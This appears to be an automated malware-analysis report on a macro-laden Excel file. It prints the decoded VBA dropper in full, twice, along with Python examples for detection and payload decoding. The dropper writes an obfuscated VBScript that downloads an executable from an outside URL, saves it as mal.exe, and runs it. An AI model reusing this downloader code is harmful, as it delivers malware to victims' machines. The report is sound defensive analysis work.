Verdict: MALICIOUS
Risk score: 244
Heuristics (7)

VBA project inside OOXML [medium] (OOXML_VBA; 4 related findings)
Document contains a VBA project, so VBA macros are present.

Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
Potential Shell call in VBA.
Matched line in script: Shell "wscript C:\Users\Soheil\Desktop\j.vbs"

Obfuscated VBA Shell command with URL [critical] (OLE_VBA_OBFUSCATED_SHELL_URL)
VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
Matched line in script: Shell "wscript C:\Users\Soheil\Desktop\j.vbs"
Note that the matched Shell argument is itself a literal path; the decoder-assembled content is the j.vbs script the macro writes immediately beforehand, which carries the URL inside a double-Base64 string.

VBA downloads and writes a file to disk [critical] (OLE_VBA_HTTP_DROP_EXEC)
VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-and-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script: Print #PayLoadFile, bd("IC53cml0ZSB4LnJlc3BvbnNlQm9keQ==") ' .write x.responseBody'

VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the rule's detail line.
Caveat: the decoded source below has no Auto_Open-style handler. Its visible entry points are Worksheet_SelectionChange handlers keyed to cells S200 and D420, which run only when a user selects those cells, and Sheet1's handler calls a procedure named ghd that is absent from the extracted source. Rely on the rule's detail line, not the decoded source, for which tokens matched.

Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Embedded URL [info] (EMBEDDED_URL)
One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: https://www.cardbox.com/download/samples1.exe (referenced by macro)
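
The pairing rule described under OLE_VBA_PCODE_AUTOEXEC_EXEC, written out as an added example (this is not the analyzer's own implementation). It scans a byte stream for an auto-exec entry point and an execution token using the two token lists quoted above, and fires only when one of each is present. Matching over both ASCII and UTF-16LE spellings is an assumption about how identifiers survive in compiled streams; the sample inputs are constructed, the first one being a cut-down copy of the decoded source in this report, whose only entry point is a Worksheet_SelectionChange handler and which therefore must not trigger the rule.

```python
"""Co-occurrence check in the shape of OLE_VBA_PCODE_AUTOEXEC_EXEC (added example)."""

AUTOEXEC_TOKENS = (
    "Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
    "Auto_Close", "AutoClose",
)
EXEC_TOKENS = (
    "Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
    "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
    "ShellExecute", "ExecuteExcel4Macro",
)


def find_tokens(stream: bytes, tokens) -> list:
    """Return the tokens present in `stream`, in list order, ignoring case.

    bytes.lower() only folds ASCII letters, which is exactly what is needed
    for both the ASCII and the UTF-16LE spelling of an identifier.
    """
    low = stream.lower()
    hits = []
    for tok in tokens:
        needle = tok.lower()
        if needle.encode("ascii") in low or needle.encode("utf-16-le") in low:
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream: bytes) -> dict:
    """Apply the pairing rule: fires only when both token classes co-occur."""
    autoexec = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    return {"autoexec": autoexec, "exec": execs, "fired": bool(autoexec and execs)}


# Constructed inputs. DECODED_SOURCE is a cut-down copy of the decoded macro in
# this report: its entry point is Worksheet_SelectionChange, not an auto-exec
# handler, so the rule must NOT fire even though Shell is present.
DECODED_SOURCE = b"""
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    If Not Intersect(Target, Range("S200")) Is Nothing Then Call Module1.MyMacro
End Sub
Sub MyMacro()
    Shell "wscript C:\\Users\\Soheil\\Desktop\\j.vbs"
End Sub
"""
# Constructed: entry point paired with execution tokens -> fires.
STREAM_PAIRED = b'Sub Auto_Open()\r\nShell "cmd.exe /c whoami"\r\nEnd Sub'
# Constructed: entry point with nothing to execute -> does not fire.
STREAM_ENTRY_ONLY = b"Sub Auto_Open()\r\nMsgBox 1\r\nEnd Sub"
# Constructed: the same pairing stored as UTF-16LE (assumed record encoding).
STREAM_UTF16 = 'Sub Workbook_Open()\r\nSet o = CreateObject("WScript.Shell")'.encode("utf-16-le")

if __name__ == "__main__":
    for name, s in [("decoded source", DECODED_SOURCE), ("paired", STREAM_PAIRED),
                    ("entry only", STREAM_ENTRY_ONLY), ("utf16", STREAM_UTF16)]:
        print(f"{name:15} -> {pcode_autoexec_exec(s)}")
```

Because the rule is a substring check, "Shell" also matches inside WScript.Shell and ShellExecute, which is what the heuristic intends: it is looking for capability, not for exact identifiers.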
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10340 bytes |

SHA-256: 3471795b50d6182390a7cdbdafe659b3a30ca770b8e7343e8195e86998d231f9

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
If Selection.Count = 1 Then
If Not Intersect(Target, Range("S200")) Is Nothing Then
Call Module1.MyMacro
End If
End If
End Sub
Sub MyMacro()
Dim PayLoadFile As Integer
Dim FilePath As String
FilePath = "C:\Users\Soheil\Desktop\j.vbs"
PayLoadFile = FreeFile
Open FilePath For Output As PayLoadFile
Print #PayLoadFile, bd("ZGltIHg6IFNldCB4ID0gY3JlYXRlb2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIp") 'dim x: Set x = createobject("Microsoft.XMLHTTP")'
Print #PayLoadFile, bd("IGRpbSBiOiBTZXQgYiA9IGNyZWF0ZW9iamVjdCgiQWRvZGIuU3RyZWFtIik=") 'dim b: Set b = createobject("Adodb.Stream")'
Print #PayLoadFile, bd(bd("SUhndVQzQmxiaUFpUjBWVUlpd2dJbWgwZEhCek9pOHZkM2QzTG1OaGNtUmliM2d1WTI5dEwyUnZkMjVzYjJGa0wzTmhiWEJzWlhNeExtVjRaU0lzSUVaaGJITmw=")) ' x.Open "GET", "https://www.cardbox.com/download/samples1.exe", False'
Print #PayLoadFile, bd("IHguU2VuZA==") 'x.Send'
Print #PayLoadFile, bd("IHdpdGggYg==") ' with b'
Print #PayLoadFile, bd("IC50eXBlID0gMQ==") ' .type = 1'
Print #PayLoadFile, bd("IC5vcGVu") ' .open'
Print #PayLoadFile, bd("IC53cml0ZSB4LnJlc3BvbnNlQm9keQ==") ' .write x.responseBody'
Print #PayLoadFile, bd("LnNhdmV0b2ZpbGUiQzpcVXNlcnNcU29oZWlsXERlc2t0b3BcbWFsLmV4ZSIsIDI=") ' .savetofile "C:\Users\Soheil\Desktop\mal.exe", 2'
Print #PayLoadFile, bd("IGVuZCB3aXRo") 'end with'
Close PayLoadFile
Shell "wscript C:\Users\Soheil\Desktop\j.vbs"
Application.Wait (Now + TimeValue("0:00:03"))
Shell "C:\Users\Soheil\Desktop\mal.exe"
End Sub
Function be(inData)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim cOut, sOut, I
For I = 1 To Len(inData) Step 3
Dim nGroup, pOut, sGroup
nGroup = &H10000 * Asc(Mid(inData, I, 1)) + _
&H100 * MyASC(Mid(inData, I + 1, 1)) + MyASC(Mid(inData, I + 2, 1))
nGroup = Oct(nGroup)
nGroup = String(8 - Len(nGroup), "0") & nGroup
pOut = Mid(Base64, CLng("&o" & Mid(nGroup, 1, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 3, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 5, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 7, 2)) + 1, 1)
sOut = sOut + pOut
Next
Select Case Len(inData) Mod 3
Case 1:
sOut = Left(sOut, Len(sOut) - 2) + "=="
Case 2:
sOut = Left(sOut, Len(sOut) - 1) + "="
End Select
be = sOut
End Function
Function MyASC(OneChar)
If OneChar = "" Then MyASC = 0 Else MyASC = Asc(OneChar)
End Function
Function bd(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "bd", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "bd", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
bd = sOut
End Function
Attribute VB_Name = "Module2"
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
If Selection.Count = 1 Then
If Not Intersect(Target, Range("D420")) Is Nothing Then
Call ghd
End If
End If
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
If Selection.Count = 1 Then
If Not Intersect(Target, Range("S200")) Is Nothing Then
Call Module1.MyMacro
End If
End If
End Sub
Sub MyMacro()
Dim PayLoadFile As Integer
Dim FilePath As String
FilePath = "C:\Users\Soheil\Desktop\j.vbs"
PayLoadFile = FreeFile
Open FilePath For Output As PayLoadFile
Print #PayLoadFile, bd("ZGltIHg6IFNldCB4ID0gY3JlYXRlb2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIp") 'dim x: Set x = createobject("Microsoft.XMLHTTP")'
Print #PayLoadFile, bd("IGRpbSBiOiBTZXQgYiA9IGNyZWF0ZW9iamVjdCgiQWRvZGIuU3RyZWFtIik=") 'dim b: Set b = createobject("Adodb.Stream")'
Print #PayLoadFile, bd(bd("SUhndVQzQmxiaUFpUjBWVUlpd2dJbWgwZEhCek9pOHZkM2QzTG1OaGNtUmliM2d1WTI5dEwyUnZkMjVzYjJGa0wzTmhiWEJzWlhNeExtVjRaU0lzSUVaaGJITmw=")) ' x.Open "GET", "https://www.cardbox.com/download/samples1.exe", False'
Print #PayLoadFile, bd("IHguU2VuZA==") 'x.Send'
Print #PayLoadFile, bd("IHdpdGggYg==") ' with b'
Print #PayLoadFile, bd("IC50eXBlID0gMQ==") ' .type = 1'
Print #PayLoadFile, bd("IC5vcGVu") ' .open'
Print #PayLoadFile, bd("IC53cml0ZSB4LnJlc3BvbnNlQm9keQ==") ' .write x.responseBody'
Print #PayLoadFile, bd("LnNhdmV0b2ZpbGUiQzpcVXNlcnNcU29oZWlsXERlc2t0b3BcbWFsLmV4ZSIsIDI=") ' .savetofile "C:\Users\Soheil\Desktop\mal.exe", 2'
Print #PayLoadFile, bd("IGVuZCB3aXRo") 'end with'
Close PayLoadFile
Shell "wscript C:\Users\Soheil\Desktop\j.vbs"
Application.Wait (Now + TimeValue("0:00:03"))
Shell "C:\Users\Soheil\Desktop\mal.exe"
End Sub
Function be(inData)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim cOut, sOut, I
For I = 1 To Len(inData) Step 3
Dim nGroup, pOut, sGroup
nGroup = &H10000 * Asc(Mid(inData, I, 1)) + _
&H100 * MyASC(Mid(inData, I + 1, 1)) + MyASC(Mid(inData, I + 2, 1))
nGroup = Oct(nGroup)
nGroup = String(8 - Len(nGroup), "0") & nGroup
pOut = Mid(Base64, CLng("&o" & Mid(nGroup, 1, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 3, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 5, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 7, 2)) + 1, 1)
sOut = sOut + pOut
Next
Select Case Len(inData) Mod 3
Case 1:
sOut = Left(sOut, Len(sOut) - 2) + "=="
Case 2:
sOut = Left(sOut, Len(sOut) - 1) + "="
End Select
be = sOut
End Function
Function MyASC(OneChar)
If OneChar = "" Then MyASC = 0 Else MyASC = Asc(OneChar)
End Function
Function bd(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "bd", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "bd", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
bd = sOut
End Function
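
The dropped second stage, reconstructed statically as an added example (not part of this report and not oletools code). It parses the `Print #PayLoadFile, bd(...)` lines of the decoded macro, applies bd() once per nesting level (the macro's own bd() is a plain Base64 decoder, as its source above shows), and pulls the IOCs out of the result, so the download URL, the drop path and the COM ProgIDs come from the encoded payload itself rather than from the author's trailing comments. The macro snippet is copied from the extracted macros.bas with those comments removed; decoding bytes as Latin-1 is an assumption that holds for this all-ASCII payload.

```python
"""Reconstruct the j.vbs second stage that MyMacro writes to disk (added example)."""
import base64
import re

# Copied from the decoded macro above, trailing comments removed.
MACRO_SNIPPET = r'''
FilePath = "C:\Users\Soheil\Desktop\j.vbs"
PayLoadFile = FreeFile
Open FilePath For Output As PayLoadFile
Print #PayLoadFile, bd("ZGltIHg6IFNldCB4ID0gY3JlYXRlb2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIp")
Print #PayLoadFile, bd("IGRpbSBiOiBTZXQgYiA9IGNyZWF0ZW9iamVjdCgiQWRvZGIuU3RyZWFtIik=")
Print #PayLoadFile, bd(bd("SUhndVQzQmxiaUFpUjBWVUlpd2dJbWgwZEhCek9pOHZkM2QzTG1OaGNtUmliM2d1WTI5dEwyUnZkMjVzYjJGa0wzTmhiWEJzWlhNeExtVjRaU0lzSUVaaGJITmw="))
Print #PayLoadFile, bd("IHguU2VuZA==")
Print #PayLoadFile, bd("IHdpdGggYg==")
Print #PayLoadFile, bd("IC50eXBlID0gMQ==")
Print #PayLoadFile, bd("IC5vcGVu")
Print #PayLoadFile, bd("IC53cml0ZSB4LnJlc3BvbnNlQm9keQ==")
Print #PayLoadFile, bd("LnNhdmV0b2ZpbGUiQzpcVXNlcnNcU29oZWlsXERlc2t0b3BcbWFsLmV4ZSIsIDI=")
Print #PayLoadFile, bd("IGVuZCB3aXRo")
Close PayLoadFile
Shell "wscript C:\Users\Soheil\Desktop\j.vbs"
Application.Wait (Now + TimeValue("0:00:03"))
Shell "C:\Users\Soheil\Desktop\mal.exe"
'''

# One Print statement: one or more nested bd( wrappers around a Base64 literal.
PRINT_RE = re.compile(r'Print\s+#\w+,\s*((?:bd\()+)"([A-Za-z0-9+/=]+)"\)+')
URL_RE = re.compile(r'https?://[^\s"\']+')
WINPATH_RE = re.compile(r'[A-Za-z]:\\[^\s"\']+')
PROGID_RE = re.compile(r'createobject\s*\(\s*"([^"]+)"', re.IGNORECASE)
SHELL_RE = re.compile(r'^\s*Shell\s+"([^"]+)"', re.MULTILINE)


def bd(blob: str, depth: int) -> str:
    """Mirror the macro's bd(): strict Base64, applied `depth` times.

    The macro emits each byte with Chr(); Latin-1 is assumed here (Chr() is
    codepage-dependent above 0x7F, which this payload never reaches).
    """
    data = blob.encode("ascii")
    for _ in range(depth):
        data = base64.b64decode(data, validate=True)
    return data.decode("latin-1")


def reconstruct(macro_text: str) -> dict:
    """Return the dropped script's lines plus the IOCs it and the macro expose."""
    lines = [bd(blob, wrappers.count("bd(")) for wrappers, blob in PRINT_RE.findall(macro_text)]
    dropped = "\r\n".join(lines)  # Print # writes one CRLF-terminated record per call
    return {
        "lines": lines,
        "dropped_script": dropped,
        "urls": sorted(set(URL_RE.findall(dropped))),
        "paths": sorted(set(WINPATH_RE.findall(dropped) + WINPATH_RE.findall(macro_text))),
        "progids": PROGID_RE.findall(dropped),
        "shell_commands": SHELL_RE.findall(macro_text),
    }


if __name__ == "__main__":
    result = reconstruct(MACRO_SNIPPET)
    print("--- reconstructed j.vbs ---")
    print(result["dropped_script"])
    for key in ("urls", "paths", "progids", "shell_commands"):
        print(f"{key}: {result[key]}")
```

Decoding the payload rather than reading the comments also surfaces a small discrepancy: the ninth record decodes to `.savetofile"C:\Users\Soheil\Desktop\mal.exe", 2` with no space before the quote, whereas the author's comment shows one. Comments in a dropper are documentation the attacker chose to leave; the Base64 is what actually runs.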

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 54272 bytes |

SHA-256: 3b6251e707b2bac81760cefadb3fb32befc8f11f647a997bbeb0f7c72d1c02c6

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))